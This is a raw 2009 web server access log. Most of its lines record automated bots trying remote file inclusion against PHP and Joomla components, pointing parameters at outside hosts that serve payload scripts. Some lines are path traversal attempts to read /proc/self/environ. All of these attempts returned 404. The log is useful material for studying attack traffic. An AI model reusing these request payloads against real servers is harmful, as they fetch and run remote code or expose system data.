72.30.161.230 - - [15/Jul/2009:00:42:43 -0400] "GET /logs/error_log.Q109050900 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.16.115.69 - - [15/Jul/2009:00:42:53 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.orstalumni.com/board//include/oil2.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
62.16.115.69 - - [15/Jul/2009:00:42:53 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.orstalumni.com/board//include/oil2.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
62.16.115.69 - - [15/Jul/2009:00:42:53 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.orstalumni.com/board//include/oil2.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
62.16.115.69 - - [15/Jul/2009:00:42:54 -0400] "GET /logs/access_log.Q109063000//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.orstalumni.com/board//include/oil2.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
62.16.115.69 - - [15/Jul/2009:00:42:54 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.orstalumni.com/board//include/oil2.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
62.16.115.69 - - [15/Jul/2009:00:42:54 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.orstalumni.com/board//include/oil2.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
62.16.115.69 - - [15/Jul/2009:00:42:54 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.orstalumni.com/board//include/oil2.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
62.16.115.69 - - [15/Jul/2009:00:42:55 -0400] "GET /logs/access_log.Q109063000//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.orstalumni.com/board//include/oil2.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
209.59.12.99 - - [15/Jul/2009:00:43:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.192.120.182 - - [15/Jul/2009:00:43:17 -0400] "GET /logs/access_log.Q109051600%20%20/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.ceptalavera.com/modules/Permissions/pnimages/fx29id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
67.192.120.182 - - [15/Jul/2009:00:43:17 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.ceptalavera.com/modules/Permissions/pnimages/fx29id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
67.192.120.182 - - [15/Jul/2009:00:43:17 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.ceptalavera.com/modules/Permissions/pnimages/fx29id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.30.161.230 - - [15/Jul/2009:00:43:26 -0400] "GET /logs/error_log.Q109052600 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.192.120.182 - - [15/Jul/2009:00:43:55 -0400] "GET /logs/access_log.Q109051600/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.ceptalavera.com/modules/Permissions/pnimages/fx29id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
82.194.87.219 - - [15/Jul/2009:00:44:01 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://webmaster-100.com/images/id? HTTP/1.1" 404 254 "-" "libwww-perl/5.822"
59.22.140.17 - - [15/Jul/2009:00:44:08 -0400] "GET /logs/home.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
59.22.140.17 - - [15/Jul/2009:00:44:08 -0400] "GET /logs/access_log.Q109053100%20%20/home.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.22.140.17 - - [15/Jul/2009:00:44:08 -0400] "GET /home.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
67.192.120.182 - - [15/Jul/2009:00:44:41 -0400] "GET /logs/access_log.Q109051600/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
67.192.120.182 - - [15/Jul/2009:00:44:41 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
67.192.120.182 - - [15/Jul/2009:00:44:41 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
67.192.120.182 - - [15/Jul/2009:00:44:41 -0400] "GET /logs/access_log.Q109051600/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
67.192.120.182 - - [15/Jul/2009:00:44:42 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
67.192.120.182 - - [15/Jul/2009:00:44:42 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
59.22.140.17 - - [15/Jul/2009:00:45:00 -0400] "GET /logs/access_log.Q109053100/home.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
67.192.120.182 - - [15/Jul/2009:00:45:12 -0400] "GET /logs/error_log.Q109051600/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
67.192.120.182 - - [15/Jul/2009:00:45:14 -0400] "GET /logs/error_log.Q109051600/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
67.192.120.182 - - [15/Jul/2009:00:46:08 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.ceptalavera.com/modules/Permissions/pnimages/fx29id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
67.192.120.182 - - [15/Jul/2009:00:46:08 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.ceptalavera.com/modules/Permissions/pnimages/fx29id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
67.192.120.182 - - [15/Jul/2009:00:46:08 -0400] "GET /logs/access_log.Q109061500%20%20/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.ceptalavera.com/modules/Permissions/pnimages/fx29id1.txt? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
211.230.156.161 - - [15/Jul/2009:00:47:17 -0400] "GET /logs/access_log.Q109051000/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
211.230.156.161 - - [15/Jul/2009:00:47:17 -0400] "GET /logs/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.230.156.161 - - [15/Jul/2009:00:47:17 -0400] "GET /administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
67.192.120.182 - - [15/Jul/2009:00:47:25 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 286 "-" "libwww-perl/5.805"
67.192.120.182 - - [15/Jul/2009:00:47:25 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
67.192.120.182 - - [15/Jul/2009:00:47:25 -0400] "GET /logs/access_log.Q109061500/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 308 "-" "libwww-perl/5.805"
67.192.120.182 - - [15/Jul/2009:00:47:29 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
67.192.120.182 - - [15/Jul/2009:00:47:29 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 286 "-" "libwww-perl/5.805"
67.192.120.182 - - [15/Jul/2009:00:47:29 -0400] "GET /logs/access_log.Q109061500/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 308 "-" "libwww-perl/5.805"
62.149.163.198 - - [15/Jul/2009:00:47:37 -0400] "GET /logs/access_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
62.149.163.198 - - [15/Jul/2009:00:47:37 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
62.149.163.198 - - [15/Jul/2009:00:47:37 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 239 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
62.149.163.198 - - [15/Jul/2009:00:47:38 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
62.149.163.198 - - [15/Jul/2009:00:47:38 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
62.149.163.198 - - [15/Jul/2009:00:47:38 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 239 "-" "XXXXXX"
62.149.163.198 - - [15/Jul/2009:00:47:38 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 234 "-" "XXXXXX"
62.149.163.198 - - [15/Jul/2009:00:47:38 -0400] "GET /logs/access_log.Q109060200/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
62.149.163.198 - - [15/Jul/2009:00:47:38 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 239 "-" "XXXXXX"
62.149.163.198 - - [15/Jul/2009:00:47:38 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "XXXXXX"
62.149.163.198 - - [15/Jul/2009:00:47:39 -0400] "GET /logs/access_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 261 "-" "XXXXXX"
62.149.163.198 - - [15/Jul/2009:00:47:39 -0400] "GET /logs/access_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 261 "-" "XXXXXX"
67.192.120.182 - - [15/Jul/2009:00:47:41 -0400] "GET /logs/access_log.Q109061500/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.ceptalavera.com/modules/Permissions/pnimages/fx29id1.txt? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
67.192.120.182 - - [15/Jul/2009:00:47:42 -0400] "GET /logs/error_log.Q109061500/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 307 "-" "libwww-perl/5.805"
69.61.61.146 - - [15/Jul/2009:00:47:50 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.827"
69.61.61.146 - - [15/Jul/2009:00:47:50 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.827"
69.61.61.146 - - [15/Jul/2009:00:47:51 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.827"
204.30.3.225 - - [15/Jul/2009:00:47:53 -0400] "GET /administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
204.30.3.225 - - [15/Jul/2009:00:47:53 -0400] "GET /logs/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
204.30.3.225 - - [15/Jul/2009:00:47:53 -0400] "GET /logs/access_log.Q109051000/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
207.58.155.223 - - [15/Jul/2009:00:47:53 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.810"
207.58.155.223 - - [15/Jul/2009:00:47:53 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.810"
207.58.155.223 - - [15/Jul/2009:00:47:53 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
63.247.72.114 - - [15/Jul/2009:00:47:54 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.824"
63.247.72.114 - - [15/Jul/2009:00:47:54 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.824"
67.192.120.182 - - [15/Jul/2009:00:47:54 -0400] "GET /logs/error_log.Q109061500/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 307 "-" "libwww-perl/5.805"
63.247.72.114 - - [15/Jul/2009:00:47:54 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.824"
209.59.12.99 - - [15/Jul/2009:00:48:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.192.120.182 - - [15/Jul/2009:00:48:29 -0400] "GET /logs/access_log.Q109061500%20/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 309 "-" "libwww-perl/5.805"
207.58.155.223 - - [15/Jul/2009:00:48:36 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.810"
207.58.155.223 - - [15/Jul/2009:00:48:36 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.810"
207.58.155.223 - - [15/Jul/2009:00:48:36 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
62.149.163.198 - - [15/Jul/2009:00:48:37 -0400] "GET /logs/access_log.Q109070300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
62.149.163.198 - - [15/Jul/2009:00:48:37 -0400] "GET /logs/access_log.Q109070300/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.149.163.198 - - [15/Jul/2009:00:48:37 -0400] "GET /logs/access_log.Q109070300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 261 "-" "XXXXXX"
62.149.163.198 - - [15/Jul/2009:00:48:37 -0400] "GET /logs/access_log.Q109070300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 261 "-" "XXXXXX"
68.4.59.250 - - [15/Jul/2009:00:48:42 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB6; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
68.4.59.250 - - [15/Jul/2009:00:48:42 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB6; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
68.4.59.250 - - [15/Jul/2009:00:48:43 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB6; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
68.4.59.250 - - [15/Jul/2009:00:48:43 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB6; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
67.192.120.182 - - [15/Jul/2009:00:48:44 -0400] "GET /logs/access_log.Q109061500%20/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 309 "-" "libwww-perl/5.805"
63.247.72.114 - - [15/Jul/2009:00:48:49 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.824"
63.247.72.114 - - [15/Jul/2009:00:48:49 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.824"
63.247.72.114 - - [15/Jul/2009:00:48:49 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.824"
69.61.61.146 - - [15/Jul/2009:00:48:50 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.827"
211.121.173.196 - - [15/Jul/2009:00:48:51 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.800"
211.121.173.196 - - [15/Jul/2009:00:48:52 -0400] "GET //modules/errors.php?error=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.800"
63.247.72.114 - - [15/Jul/2009:00:48:52 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.824"
211.121.173.196 - - [15/Jul/2009:00:48:52 -0400] "GET /logs//modules/errors.php?error=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.800"
207.58.155.223 - - [15/Jul/2009:00:48:56 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.810"
69.61.61.146 - - [15/Jul/2009:00:49:04 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.827"
69.61.61.146 - - [15/Jul/2009:00:49:04 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.827"
69.61.61.146 - - [15/Jul/2009:00:49:05 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.827"
72.30.161.230 - - [15/Jul/2009:00:49:11 -0400] "GET /logs/error_log.Q107100600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.58.155.223 - - [15/Jul/2009:00:49:23 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.810"
63.247.72.114 - - [15/Jul/2009:00:49:38 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.824"
69.61.61.146 - - [15/Jul/2009:00:49:58 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.827"
85.18.1.11 - - [15/Jul/2009:00:50:02 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
85.18.1.11 - - [15/Jul/2009:00:50:03 -0400] "GET //modules/errors.php?error=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
85.18.1.11 - - [15/Jul/2009:00:50:05 -0400] "GET /logs//modules/errors.php?error=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
117.74.99.225 - - [15/Jul/2009:00:50:10 -0400] "GET /logs/access_log.Q109061500/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 308 "-" "libwww-perl/5.79"
117.74.99.225 - - [15/Jul/2009:00:50:10 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
117.74.99.225 - - [15/Jul/2009:00:50:10 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
66.249.68.247 - - [15/Jul/2009:00:50:13 -0400] "GET /images/over-index5_rongeur.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
211.121.173.196 - - [15/Jul/2009:00:50:50 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.800"
211.121.173.196 - - [15/Jul/2009:00:50:50 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.800"
211.121.173.196 - - [15/Jul/2009:00:50:51 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.800"
123.143.98.5 - - [15/Jul/2009:00:51:10 -0400] "GET /logs/access_log.Q109061900/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
123.143.98.5 - - [15/Jul/2009:00:51:10 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
123.143.98.5 - - [15/Jul/2009:00:51:10 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
117.74.99.225 - - [15/Jul/2009:00:51:17 -0400] "GET /logs/error_log.Q109061500/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 307 "-" "libwww-perl/5.79"
123.143.98.5 - - [15/Jul/2009:00:52:09 -0400] "GET /logs/error_log.Q109061900/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
211.121.173.196 - - [15/Jul/2009:00:52:13 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.800"
